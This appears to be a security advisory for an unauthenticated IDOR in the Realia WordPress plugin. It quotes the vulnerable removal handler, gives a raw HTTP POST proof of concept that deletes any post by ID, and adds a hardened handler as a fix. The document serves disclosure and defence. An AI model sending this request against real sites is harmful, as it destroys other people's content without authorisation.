While investigating an IDOR issue in a premium theme that allowed arbitrary deletion of Ads, the Realia plugin was found to be the cause.
With this plugin installed, unauthenticated attackers can delete arbitrary posts by submitting a request containing the ID of the post to delete.
In includes/class-realia-submission.php, the removal handler is hooked on init and passes $_POST['property_id'] straight to wp_delete_post() with no authentication, capability or nonce check:

add_action( 'init', array( __CLASS__, 'process_remove_form' ), 9999 );
[...]
public static function process_remove_form() {
    if ( ! isset( $_POST['remove_property_form'] ) || empty( $_POST['property_id'] ) ) {
        return;
    }
    if ( wp_delete_post( $_POST['property_id'] ) ) {
        $_SESSION['messages'][] = array( 'success', __( 'Property has been successfully removed.', 'realia' ) );
    } else {
        $_SESSION['messages'][] = array( 'danger', __( 'An error occured when removing an item.', 'realia' ) );
    }
}

PoC:

POST / HTTP/1.1
Host: 127.0.0.1
User-Agent: PoC/Realia-1.4-IDOR
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 35

property_id=7&remove_property_form=
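
A hardened form of the process_remove_form handler shown above, as an added example (not the plugin's own code and not the vendor's patch). The function name, the nonce action and field names, and the 'property' post type are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's code. Assumptions: the removal form prints
// wp_nonce_field( 'realia_remove_property', 'realia_remove_nonce' ) and
// listings are stored under the 'property' post type.
add_action( 'init', 'example_process_remove_form', 9999 );

function example_process_remove_form() {
    if ( ! isset( $_POST['remove_property_form'] ) || empty( $_POST['property_id'] ) ) {
        return;
    }

    // 1. Anonymous requests never reach wp_delete_post().
    if ( ! is_user_logged_in() ) {
        return;
    }

    // 2. CSRF: the request must carry the nonce issued with the form.
    $nonce = isset( $_POST['realia_remove_nonce'] )
        ? sanitize_text_field( wp_unslash( $_POST['realia_remove_nonce'] ) )
        : '';
    if ( ! wp_verify_nonce( $nonce, 'realia_remove_property' ) ) {
        return;
    }

    // 3. Treat the ID as an integer and confine it to the expected post type,
    //    so pages, posts and other content cannot be targeted.
    $property_id = absint( $_POST['property_id'] );
    $post        = get_post( $property_id );
    if ( ! $post || 'property' !== $post->post_type ) {
        return;
    }

    // 4. Object-level authorization: the author, or a role allowed to delete it.
    $is_owner = (int) $post->post_author === get_current_user_id();
    if ( ! $is_owner && ! current_user_can( 'delete_post', $property_id ) ) {
        $_SESSION['messages'][] = array( 'danger', __( 'An error occurred when removing an item.', 'realia' ) );
        return;
    }

    if ( wp_delete_post( $property_id ) ) {
        $_SESSION['messages'][] = array( 'success', __( 'Property has been successfully removed.', 'realia' ) );
    } else {
        $_SESSION['messages'][] = array( 'danger', __( 'An error occurred when removing an item.', 'realia' ) );
    }
}
```

With these checks in place, the request in the PoC returns at step 1 because it carries no authenticated session, and an authenticated request for another user's post ID is refused at step 4.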